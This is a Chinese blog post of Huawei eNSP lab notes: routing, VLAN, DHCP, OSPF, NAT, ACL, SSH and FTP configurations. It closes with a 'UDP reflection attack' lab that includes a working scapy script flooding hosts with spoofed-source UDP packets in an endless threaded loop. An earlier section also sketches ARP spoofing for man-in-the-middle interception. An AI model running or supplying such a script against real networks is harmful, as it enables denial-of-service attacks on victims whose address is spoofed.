【网络通信】eNSP 学习记录
2022-11-03 / 0 评论 / 654 阅读 / 124 点赞

【网络通信】eNSP 学习记录

发光的神
2022-11-03 / 0 评论 / 654 阅读 / 正在检测是否收录...

静态路由实验

实验拓扑图

l7sxjz52.png

实验目的

实现静态路由R1和R5进行通信

配置命令

// R1路由器配置
system-view // 进入系统视图
interface g0/0/0 // 进入接口
ip address 192.168.1.1 24 // 配置ip地址,命令相同配置好其它路由器

//先配置R1到R3
ip route-static 192.168.2.0 24 192.168.1.2  // 指定到 192.168.2.0 从 192.168.1.2 出去 现在我们可以过去了但需要回来所以要在R3里配置 回来的静态路由
ip route-static 192.168.1.0 24 192.168.2.2 // 这是回来的路由配置 命令相同修改下配置下面机个路由器即可

实验效果

l7sybxz0.png


用户登录实验

官方介绍

华为的super 命令设置的口令用于低级别用户向高级别用户切换时进行验证,类似于 UNIX 系统和 Linux 系统中从普通用户转换到 root 帐户时须输入 super 进行切换。华为网络设备的命令级别共分为 4 级,分别为访问级( 0 级)、监控级( 1 级)、系统级( 2 级)和管理级( 3 级),当低级别用户向高级别切换时. 输入命令 super [level],此时如果设置了super 的password,则只有验证通过后切换才能实现 。

super 的口令配置也有明文和暗文两种方式,具体命令为 super password simple ( 明文 ),super password cipher ( 暗文 ) 。
如果用户想要实现对通过 console 、 telnet 或 web 方式访问华为交换设备的身份验证,则需要在相应的虚拟端口配置验证信息。

(1) console访问 方式:需要在 user-interface con 0 模式下配置 authentication-mode 。
(2) ssh、telnet访问 方式:需要在 user-interface vty 0 4 模式下配置 authentication-mode 。
(3) web访问 方式:需要启用 web 管理服务,并要有 local-user 配置的用户和密码。

l80xuvbe.png

console口配置

user-interface 
console 物理接口 // 只有一个 0 ~ 4 默认不认证
vty 虚拟接口 // 自己定义想多少就多少0 默认认证 password

默认的权限是3 //没有修改的情况下
user-interface console 0 // 进入console口
user privilege level 0 // 修改等级

// 完整代码
<Huawei>system-view  // 进入系统视图
[Huawei]aaa // 进入3a认证
[Huawei-aaa]local-user jw1201 privilege level 0 password cipher 123456 // 配置两条命令

[Huawei]user-interface console 0 // 进入console
[Huawei-ui-console0]authentication-mode aaa // 修改认证模式aaa
// 默认的认证模式是不认证
[Huawei-ui-console0]q // 退出
[Huawei]q // 退出
<Huawei>super 3 // 进入等级不够只能使用用户视图,跳到3等级 无密码直接进入
[Huawei-aaa]local-user jw1201 password cipher 123456
[Huawei-ui-console0]authentication-mode aaa // 更改验证模式 

配置telnet

用Telnet远程进入到交换机的端口中 [Router]user-interface vty
cipher 用于对密码加密方式,输入时密码时,命令行不显示密码
privilege level 用于给与此用户拥有的权限等级(等级为0-15,15为最高权限)
service-type telnet 表示此用户用于Telnet服务
创建用户命令:[Router-aaa]local-user 创建的用户名 password cipher 密码
权限设置命令:[Router-aaa]local-user 需要修改权限的用户名 privilege level 权限等级

[Huawei]user-interface vty 0 1 // 进入虚拟接口
[Huawei-ui-vty0-1]authentication-mode aaa // 修改模式为3a
[Huawei-aaa]local-user jw1201 privilege level 3 password cipher 123456// 一行代码设置登录账号密码和等级
[Huawei-aaa]local-user jw1201 service-type telnet // 设置用户服务类型
[Huawei-aaa]q // 退出
[Huawei]telnet server enable // 开启telnet服务

配置ssh

// 生成rsa密匙:rsa local-key-pair create
[server]rsa local-key-pair create

// 服务器配置vty用户界面,设置验证方式为aaa,指定协议为ssh
[server]user-interface vty 0 4
[server-ui-vty0-4]authentication-mode aaa
[server-ui-vty0-4]protocol inbound ssh

// 在aaa视图创建ssh用户huawei密码huawei123
[server]aaa
[server-aaa]local-user huawei service-type ssh 
[server-aaa]local-user huawei password cipher huawei123

// 设置ssh用户的认证为密码
[server]ssh user huawei authentication-type password
// 开启stelnet服务,默认关闭
server]stelnet server enable 

[Huawei]dis ssh user-information // 查看是否开启ssh

// 接下来在客户端尝试连接
// 第一次登陆需要开启ssh认证
[client]ssh client first-time enable 

// 连上后,ssh用户的权限连系统视图都无法进入。
// 再给ssh用户huawei增加权限!(当然在添加用户时就可以配置)
[server]aaa
[server-aaa]local-user huawei privilege level 15 //这里给的最高权限

VLAN通信实验

实验拓扑图

l9hxmo40.png

实验目的

实现不同vlan之间的通信。
首先要知道不同vlan之间的主机是无法实现通信的,所以必须通过三层路由设备进行路由转发才能将报文从一个vlan转发到另一个vlan。
vlan技术可以将一个大的局域网划分成多个小局域网,并且隔离了广播域,使不同广播域的用户不能进行通信。

有三种方式:

  • 路由器物理接口实现
  • 路由子接口进行实现
  • VLAN IF技术实现

实验步骤

l9hy2osp.png

l9hy332q.png

1.先手动配置下主机的IP地址子网掩码和默认网关。

// 交换机配置
<Huawei>system-view // 进入系统视图
[Huawei]sysname actdream-sw1 // 改个名字
[actdream-sw1]undo info-center enable // 关闭提示信息
[actdream-sw1]vlan batch 10 20 // 创建vlan 10 20
[actdream-sw1]int e0/0/2 // 进入e0/0/2接口
[actdream-sw1-Ethernet0/0/2]port link-type access // 配置接口为access
[actdream-sw1-Ethernet0/0/2]port default vlan 10 // 配置接口属于vlan10
[actdream-sw1]int e0/0/3 // 进入e0/0/3接口
[actdream-sw1-Ethernet0/0/3]port link-type access // 配置接口为access
[actdream-sw1-Ethernet0/0/3]port default vlan 20 // 配置接口属于vlan20
[actdream-sw1]int e0/0/1 // 进入e0/0/1接口
[actdream-sw1-Ethernet0/0/1]port link-type trunk // 配置接口为trunk
[actdream-sw1-Ethernet0/0/1]port trunk allow-pass vlan all // 允许所有的vlan通过

// 路由器配置
<Huawei>system-view // 进入系统视图
[Huawei]sysname actdream-ar1 // 改个名字
[actdream-ar1]int g0/0/0.1 // 进入子接口
[actdream-ar1-GigabitEthernet0/0/0.1]ip add 192.168.1.254 24 // 给子接口配置ip地址
[actdream-ar1-GigabitEthernet0/0/0.1]dot1q termination vid 10 // 封装下给vlan10
[actdream-ar1-GigabitEthernet0/0/0.1]arp broadcast enable // 开启arp广播功能
[actdream-ar1]int g0/0/0.2 // 进入子接口
[actdream-ar1-GigabitEthernet0/0/0.2]ip add 192.168.2.254 24 // 给子接口配置ip地址
[actdream-ar1-GigabitEthernet0/0/0.2]dot1q termination vid 20 // 封装下给vlan20
[actdream-ar1-GigabitEthernet0/0/0.2]arp broadcast enable // 开启arp广播功能

2.配置好了尝试PC1 ping PC2 可以看见是能通信的。

实验效果

l9hz6q53.png


RIP动态路由实验

实验拓扑图

l9i3jwrx.png

实验目的

实现动态路由不同网段间的通信。
rip协议,通过启用rip协议,路由器可以更好的学习相邻的路由表,更好的适应多变且庞大的网络环境。

实验步骤

l9i3pcth.png

l9i3q073.png
1.先手动配置下主机的IP地址子网掩码和默认网关。

// 路由器ar1配置
<Huawei>system-view // 进入系统视图
[Huawei]sysname actdream-ar1 // 改个名字
[actdream-ar1]int g0/0/1 // 进入接口
[actdream-ar1-GigabitEthernet0/0/1]ip add 192.168.1.254 24 // 配置网关地址
[actdream-ar1-GigabitEthernet0/0/1]int g0/0/0 // 进入接口
[actdream-ar1-GigabitEthernet0/0/0]ip add 192.168.3.1 24 // 配置R1与R2路由器通信的ip
[actdream-ar1]rip // 启用rip
[actdream-ar1-rip-1]network 192.168.1.0 // 宣告网段
[actdream-ar1-rip-1]network 192.168.3.0 // 宣告网段

// 路由器ar2配置
<Huawei>system-view // 进入系统视图
[Huawei]sysname actdream-ar2 // 改个名字
[actdream-ar2]int g0/0/1
[actdream-ar2-GigabitEthernet0/0/1]ip add 192.168.2.254 24 // 配置网关地址
[actdream-ar2]int g0/0/0 // 进入接口
[actdream-ar2-GigabitEthernet0/0/0]ip add 192.168.3.2 24 // 配置R2与R1路由器通信的ip
[actdream-ar2]rip // 启用rip
[actdream-ar2-rip-1]network 192.168.3.0 // 宣告网段
[actdream-ar2-rip-1]network 192.168.2.0 // 宣告网段

实验效果

l9i43vds.png


PC相同IP MAC实验

这种情况基本不可能有的,局域网内不可能有相同的IP和MAC,当然要是有人想改那就不一样了,对了就是改IP地址和MAC地址,一开始我在想会发生什么,直到我实验了下发现都能通信!!
在Windows上改IP和MAC都是自带的,网上也有很多这样的工具。

实验拓扑

la9tw9e8.png

实验步骤

la9tvuel.png

1.三台PC机我都手动配置了IP地址,接下来就到交换机看一下。

la9tyrc2.png

2.到交换机的终端面板,进入视图输入 dis mac-add 查看交换机的mac缓存表,什么都没有,那是因为我们还没ping 对方,所以并不会广播寻找对方就没有mac缓存表了。

la9u4xgx.png

la9ua144.png

3.现在我们用PC3 ping PC2,交换机就会用ARP协议广播问谁是192.168.10.1 请把你的mac地址告诉我,这个时候是192.168.10.1的主机就会把mac给交换机,然后交换机建立mac表,进行通信。

la9ueojz.png

4.这个时候我们查交换机的mac表,就会多出两条mac地址。

la9uh9ea.png

5.我把两台PC机的mac和ip改成相同的,两台PC机同时ping PC2,观察抓包和交换机的mac地址表的变化。

la9unox3.png

la9upeov.png

6.可以发现两台PC电脑都是可以通信的,要是刷新交换机mac地址显示的话,你会发现接口一下变成e0/0/1接口一下又变成e0/0/3接口,这说明交换机两边都在回应,但这样也不影响我们通信,最多会掉一个包,看视频什么的没任何压力,玩游戏的话有可能会卡一下吧。

总结

如果内网出现大量的PC伪装成一台电脑的IP和mac,会导致对方的包不断回复给别的主机,导致对方PC断网(自己的想法)。
ARP协议这款缺陷比较大,利用好直接玩转局域网,像上面的广播问谁是192.168.10.1 这个时候,要是别人一直发响应包给交换机,
说我就是PC2 mac地址是这个,那么别人就会找伪装成PC2与你通信,欺骗网关还能当中间人对吧,流量都从你的电脑经过。


DHCP地址分配实验

DHCP代理

通过三层交换机做中继,获取路由器上dhcp IP地址池,分发给下面的PC机,个人理解有误请指正。

实验拓扑

laada1s8.png

实验步骤

laadb20q.png

// AR1 配置
sys // 进入系统模式
dhcp enable // 开启dhcp

ip pool vlan10 // 创建vlan10 ip地址池
network 192.168.10.0 mask 24
gateway-list 192.168.10.254
dns-list 8.8.8.8

ip pool vlan20 // 创建vlan20 ip地址池
network 192.168.20.0 mask 24
gateway-list 192.168.20.254
dns-list 8.8.8.8

int g0/0/0 // 配置接口ip
ip add 192.168.80.2 26
dhcp select global // 开启全局dhcp

ip route-static 0.0.0.0 0 192.168.80.1 // 添加一条静态路由

1.先全部设备都开机,好了进路由器配置下dhcp ip地址池,给G0/0/0配置IP地址。

laadvnfp.png

// LSW2 配置
sys // 进入系统视图
dhcp enable // 开启dhcp
vlan batch 10 20 50 // 创建vlan

int vlan 10 // 进入vlan10
ip address 192.168.10.254 255.255.255.0 // 配置分发的ip
dhcp select relay // 模式选择relay
dhcp relay server-ip 192.168.80.2 // 指定的ip是 g0/0/0 接口上配置的ip

int vlan 20 // 相同给vlan20 也配上
ip address 192.168.20.254 255.255.255.0
dhcp select relay
dhcp relay server-ip 192.168.80.2

int vlan 50 // 再进入vlan50 配置ip要和g0/0/0接口配置的ip在一个网段内才行。
ip add 192.168.80.1 26

int g0/0/2 // 进入接口
port link-type trunk // 配置接口类型 trunk
port trunk allow-pass vlan all // 允许所有vlan通过

2.再到三层交换机LSW2上配置下中继,给 g0/0/2 接口配置 trunk 模式。
laaeuax5.png

// LSW1 配置
sys // 进入系统模式
int g0/0/1 // 配置g0/0/1 与 g0/0/2 一致使用trunk
port link-type trunk // 配置接口类型 trunk
port trunk allow-pass vlan all // 允许所有vlan通过

int g0/0/2 // 交换机下的接口都配置成access模式就行
port link-type access // 配置接口类型 access
port default vlan 10 // 把vlan10加入接口

int g0/0/3
port link-type access // 配置接口类型 access
port default vlan 20 // 把vlan20加入接口

laaf3ysh.png

3.到这里就已经可以自动分配ip地址了,我们到pc机上把dhcp打开让它自动获取。

laaf4ozw.png

效果

laaf7lfm.png
1.查看ip地址都有,现在双方都ping一下,可以看到两台PC都可以互相通信的。

DHCP分配

最简单的dhcp自动分配地址,用接口配置的网关进行分配。

实验拓扑

lb9izlqb.png

实验步骤

lb9j1b42.png

sys // 进入系统视图
dhcp enable // 开启dhcp功能
int g0/0/0  // 进入接口
ip add 192.168.10.254 24 // 配置默认网关
dhcp select interface // 选择dhcp接口分配

1.到路由器设置下dhcp服务,让他充当dhcp服务器,往下面分配ip地址。

lb9jstse.png

2.现在到PC机上设置自动获取,这个时候就可以拿到地址了。

lb9jutt6.png

3.我们看一下获取成功,这是最简单的一种办法了。


OSPF路由实验

OSPF相关知识

OSPF一种动态路由协议,能动态学习到其他网段的路由。

1.无环路:区域内部采用树形算法;区域间采用星型拓扑
2.收敛快:相比于其他路由协议能更快速的收敛网络
3.扩展性好:当网络规模扩大的时候, OPSF支持多区域可以将一些设备划分在一个区域
4.支持认证:增加了网络的安全性

实验拓扑

laaft327.png

实验步骤

laafw1qe.png

// AR2 配置
sys // 进入系统视图
int g0/0/1 // 进入接口
ip add 192.168.10.254 24 // 配置192.168.10.1网段的路由网关

int g0/0/0 // 进入接口
ip add 200.10.20.1 24 // 配置 AR2路由器 与 AR3 之间通信的ip地址 (要在同一网段)

laafxzug.png

// AR3 配置
sys // 进入系统视图
int g0/0/0 // 进入接口
ip add 200.10.20.2 24 // 配置 AR3路由器 与 AR2 之间通信的ip地址

int g0/0/1
ip add 200.10.30.1 24 // 配置 AR3路由器 与 AR4 之间通信的ip地址 (要在同一网段)

laafzsxg.png

// AR4 配置
sys // 进入系统视图
int g0/0/1 // 进入接口
ip add 200.10.30.2 24 // 配置 AR4路由器 与 AR3 之间通信的ip地址

int g0/0/2 // 进入接口
ip add 192.168.20.254 24 // 配置192.168.20.1网段的路由网关

laag1325.png

laag1ivb.png

1.我先把路由器的ip地址和pc的ip地址都配置一下,pc机的网关要填对哦。

laagagvv.png

// AR2 配置
ospf // 进入ospf
area 0 // 区域设置0
network 192.168.10.0 0.0.0.255 // 看AR2路由器有两个线一头是 192.168.10.254
network 200.10.20.0 0.0.0.255 // 另一头是 200.10.20.0 直接进行宣告就行

laagbyi8.png

// AR3 配置 
// 下面的操作都是一样的,改下宣告的网段就行
ospf
area 0
network 192.168.10.0 0.0.0.255
network 200.10.20.0 0.0.0.255

laagphkb.png

// AR4 配置
ospf
area 0
network 192.168.10.0 0.0.0.255
network 200.10.20.0 0.0.0.255

2.现在到路由器里配置ospf,进入ospf视图里用 network 命令宣告网段,这里填的是网段加子网掩码的反码,到这里就已经配置好了ospf路由了,可以在路由器里用

laaharql.png

效果

laagwvhz.png

1.测试下能不能ping通对方,可以看到都是没问题的。


链路聚合实验

简介

链路聚合的作用 :把多个物理接口绑定成一个逻辑接口,对于带宽何链路的可靠性做提升,若其中一端口出现故障,则该成员端口的流量就会切换到成员链路中去。保障了网络传输的可靠性。
简单来说就是多连两根线,把这些线都绑定到一个逻辑接口上,要是其中有一条线出问题了,那么另外一条线就会自动补上,不影响网络的通信。

实验拓扑

laaid0i7.png

实验步骤

laairlq8.png

laairy3o.png

laaiilea.png

// LSW5 配置
sys
int eth-trunk 1
mode lacp-static
max active-linknumber 2

int e0/0/1
eth-trunk 1

int e0/0/2
eth-trunk 1

int e0/0/3
eth-trunk 1

// LSW6 配置 (相同的)
sys
int eth-trunk 1
mode lacp-static
max active-linknumber 2

int e0/0/1
eth-trunk 1

int e0/0/2
eth-trunk 1

int e0/0/3
eth-trunk 1

1.先到交换机上配置下链路聚合,把它加到这三根线上。

laaiq8dy.png

2.配置好再到交换机用 dis trunkmembership eth-trunk 1 这条命令看下状态,可以看到有两条线是开的,一条线是关的。

laaiwfb5.png

int e0/0/2 // 进入e0/0/2接口
shutdown // 关闭接口

undo shutdown // 启动接口

3.我们尝试关闭e0/0/2接口,看看e0/0/3会不会自动补上,进入e0/0/2 输入shutdown 接口就关闭了,和我想的一样自动补上了,看到e0/0/3 状态从down 切换到了 up 状态。

效果

laaj6299.png

1.关掉了其中一个接口,没有影响到他们的的通信,一个包都没丢。


端口安全实验

简介

简单来说在公司的网络环境中,为了防外部人员接入公司内部网络,在交换机上给端口都绑定上指定PC的Mac地址,防止非法计算机接入。

实验拓扑

lahqq2ol.png

实验步骤

lahqrhlh.png

lahqrvg2.png

lahqs6sp.png
1.PC机上我都手动配置好了IP地址,现在用PC机互相Ping让交换机学习下Mac地址建立mac表。

lahqww1q.png

2.到交换机使用 dis mac-add 查看mac地址表,发现三台PC机都有了。

lahr39vj.png

3.这里为了演示我就给PC1绑定下MAC地址,其他的PC都是一样的操作。

sys // 进入系统视图
int e0/0/1 // 进入接口
port-security enable // 开启端口安全
port-security mac-address sticky
port-security mac-address sticky 5489-9865-40F1 vlan 1 // 绑定mac

lahr8ib4.png
4.没改PC1 Mac地址 尝试 ping PC2,毫无疑问是可以通信的。

lahsxl51.png

5.现在改下Pc1的mac地址,看下能不能通信。

lahrdcm3.png

6.改完之后很显然是不能通信实验成功。


VLAN隔离实验

简介

简单的来说,IP地址是否属于同一子网络是根据子网掩码来决定的,如果两台PC的IP地址是一个网段的话那么可以正常通信,要是我想实现一个网段的但又不想让他们互相通信,那怎么办呢这里就要用到vlan技术了,他可以实现对IP逻辑上的隔离。

实验拓扑

lahs3uci.png

实验步骤

lahsidgt.png

1.比较简单,这里就全设置了下创建了两个vlan 10 和 20, 并把vlan加入四台PC机指定的端口上。

sys // 进入系统视图
vlan batch 10 20 // 批量创建vlan
interface Ethernet0/0/1
port link-type access // 模式改成 access
port default vlan 10 // 把vlan10加入接口里

interface Ethernet0/0/2
port link-type access // 模式改成 access
port default vlan 10 // 把vlan10加入接口里

interface Ethernet0/0/3
port link-type access // 模式改成 access
port default vlan 20 // 把vlan20加入接口里

interface Ethernet0/0/4
port link-type access // 模式改成 access
port default vlan 20 // 把vlan20加入接口里

lahsjx6h.png

2.PC1 ping PC2 可以发现是通的,他们是属于vlan 10 的所以可以,要是PC1 ping PC3 就不行了。

lahsmlu4.png

3.这就是vlan的隔离,不配置vlan 是可以通信的,因为是一个网段的。


动态NAT实验

简介

简单来说,当我们访问公网某台服务器时,我们内网IP要从路由器出去利用NAT技术,将内网IP转换为公网IP进行访问,当数据到达公网的服务器上给我们做返回,就会把数据发给转换的公网地址,让他找到内网发数据的主机传达给他,这样就实现了内网和外网的通信,IPv4本来已经枯竭了,就是有这项技术还是在用IPv4。

实验拓扑

lahtfir4.png

实验步骤

lahtvdqt.png

lahtvr0q.png

lahtw0z1.png

1.老规矩先手动配置下PC机的IP地址好通信。

lahtg7dr.png

2.上AR2路由器上配置两端的接口,让路由器之间可以互相通信。

sys // 进入系统视图
int g0/0/1 // 进入接口
ip add 200.10.10.2 24 // 给公网接口添加IP地址

int g0/0/0 // 进入接口
ip add 192.168.10.254 24 // 给内网接口添加IP地址

lahtmmmu.png

3.再配置下OSPF宣告一下网段,让他们之间可以通信。(我的思路是这样)

ospf // 进入ospf
area 0 // 区域设置 0
network 192.168.10.0 0.0.0.255 // 宣告内网网段
network 200.10.10.0 0.0.0.25 // 宣告公网网段

lahtzet2.png

4.配置好了OSPF就可以通信了,但这里出去的地址是内网地址,我们抓包看下ICMP出去的IP地址。

lahu283p.png

5.可以看到出路由器的地址是内网IP,在现实环境中那是不可能的,所以这里要做动态NAT地址转换。

lahufbvb.png

nat address-group 1 200.10.10.3 200.10.10.10 // 创建地址组 设置公网分配范围
acl 2000 // 进入基本acl
rule permit source 192.168.10.0 0.0.0.255 // 创建规则
int g0/0/1 // 进入接口
nat outbound 2000 address-group 1 no-pat // 把出口 200与ip组绑定 配置在接口上

lahuktl4.png

6.配置好再抓包ping 公网发现内网IP转换为公网IP地址了。


静态NAT实验

简介

简单来说就是内网有一台服务器或者多台,需要让公网访问的到这时就要用到静态NAT技术把内网映射到公网上。

实验拓扑

lahx9ka8.png

实验步骤

lahxg0y4.png

lahvekh9.png

lahyd8ih.png

1.老规矩先手动配置下服务器和PC机的IP地址 好进行通信,这里的标签我写错了AR3下面G0/0/0,现改成 200.10.20.254。

lahxrd8c.png

2.先到AR2路由器里配置下两端的IP地址,加上OSPF建立下邻居关系。

sys // 进入系统视图
int g0/0/0 // 进入接口
ip add 200.10.10.2 24 // 添加IP地址
int g0/0/1
ip add 192.168.10.254 24
int g0/0/2
ip add 8.8.8.1 24

ospf // 进入ospf
area 0 // 区域设置0
network 192.168.10.0 0.0.0.255 // 宣告网段
network 200.10.10.0 0.0.0.25
network 8.8.8.0 0.0.0.255

lahzqij5.png

3.然后再到AR3路由器里配置下,接口通信的IP地址,加上OSPF宣告下网段。

sys // 进入系统视图
int g0/0/1 // 进入接口
ip add 200.10.10.1 24 // 配置ip地址

ospf
area 0
network 200.10.10.0 0.0.0.255
network 200.10.20.0 0.0.0.255

lahy3tuh.png

4.配置好基本上内网服务器能ping通外网了,现在给AR2路由器做下静态NAT。

lahybyxw.png

5.再到dns服务器上,添加下内网服务器映射的公网IP与域名进行绑定,好了之后记得把服务器都启动起来。

lai01b72.png

6.再去 Client1上配置好DNS地址,可以自己测试 ping dns 看看能不能通信。
lai03h66.png

7.全都配置好后,就可以获取内网服务器的服务数据了。


ACL访问控制实验

简介

ACL是访问控制列表,它是一种包过滤防火墙,路由器和交换机接口的指令列表,有了它可以实现数据包出入的控制,它分为基本acl和高级acl,这里就实现个基本acl。

实验拓扑

laif74ef.png

实验步骤

laifh108.png

laifhjh7.png

1.手动配置下IP地址和网关,这样才可以进行通信。

laifg3h8.png

2.进入AR1路由器给两边的接口,配置下IP地址先然后它们就可以通信了。

laifkvuc.png
3.有PC1 ping PC2 发现是可以通信的,接下来配置下基本acl阻止PC1与PC2之间的通信。

lajuigws.png

acl 2000 // 配置基本acl
rule 15 deny source 192.168.10.0 0.0.0.255 

int g0/0/0 // 进入接口
traffic-filter outbound acl 2000 // 配置出站过滤

4.配置好acl,在里面添加网段 192.168.10.0,阻止这所有的主机,当然也可以指定IP地址了。

lajumayg.png
5.配置好后尝试ping,发现不能通信了实验成功。


FTP文件上传实验

简介

FTP服务器,是在互联网上提供存储空间的计算机,它们依照FTP协议提供服务,全称是File Transfer Protocol(文件传输协议),简单的来说,就是一台服务器专门用存储文件的也可以用来共享。

实验拓扑

lap45f40.png

实验步骤

lap47vu6.png

lap485w3.png

1.老规矩先手动配置下IP地址,这样才能通信。

lap4boby.png
2.再配置下路由器旁边的接口ip地址。
lap4i3de.png

int g0/0/0 // 进入接口
ip add 192.168.2.254 24 // 配置FTP服务器网关

int g0/0/1 // 进入接口
ip add 192.168.3.254 24 // 配置设备网关

3.再到FTP服务器设置面板,选择文件路径并开启FTP服务器。
lap4f1el.png

4.好了之后,使用Client1 ping ftp服务器看看能不能通信,可以看到是可以的。

lap4m1wv.png

ftp 192.168.2.3
User(192.168.2.3:(none)):act  // 第一次会让你配置下账号密码
331 Password required for act .
Enter password:               // 输入密码

5.再回到路由器连接下FTP服务器,配置下账号和密码。

lap4ur3w.png

6.然后输入在路由器更改的账号和密码,用设备进行登录就成功了,就可以上传文件和下载文件了。


UDP反射攻击实验

简介

UDP 反射攻击的基本原理是,攻击者发送伪造的 UDP 请求数据包到反射主机,并将源 IP 地址伪造为受害主机的地址,反射主机接收请求后,会将数据包转发给受害主机,这样就能对受害主机进行拒绝服务攻击,当然你可以批量的反射那么就有多台主机进行攻击。

实验拓扑

lhy88o52.png

这里只是拿eNSP打个比方,服务并没开UDP 53端口,所以攻击不成立,对方必须开启UDP 端口,你才能进行反射攻击。

lhy95fnl.png

lhy8umps.png

通过发起攻击抓包可以发现,反射的 1.2 PC 与 1.4 主机,都进行发送响应给 1.3 PC 主机,实验目的达成。

UDP反射代码

import threading
from scapy.all import *

payload = '0' * 1400  # 构造一个长度为 1400 字节的字符串

def send_packet(src_ip):
    packet = IP(src="192.168.1.3", dst=src_ip) / \
        UDP(dport=53, sport=RandShort()) / \
        Raw(load=payload)
    send(packet)

hosts = ["192.168.1.2", "192.168.1.4"]
while True:
    for src_ip in hosts:
        t = threading.Thread(target=send_packet, args=(src_ip,))
        t.start()
    t.join()
124

评论 (0)

取消
0:00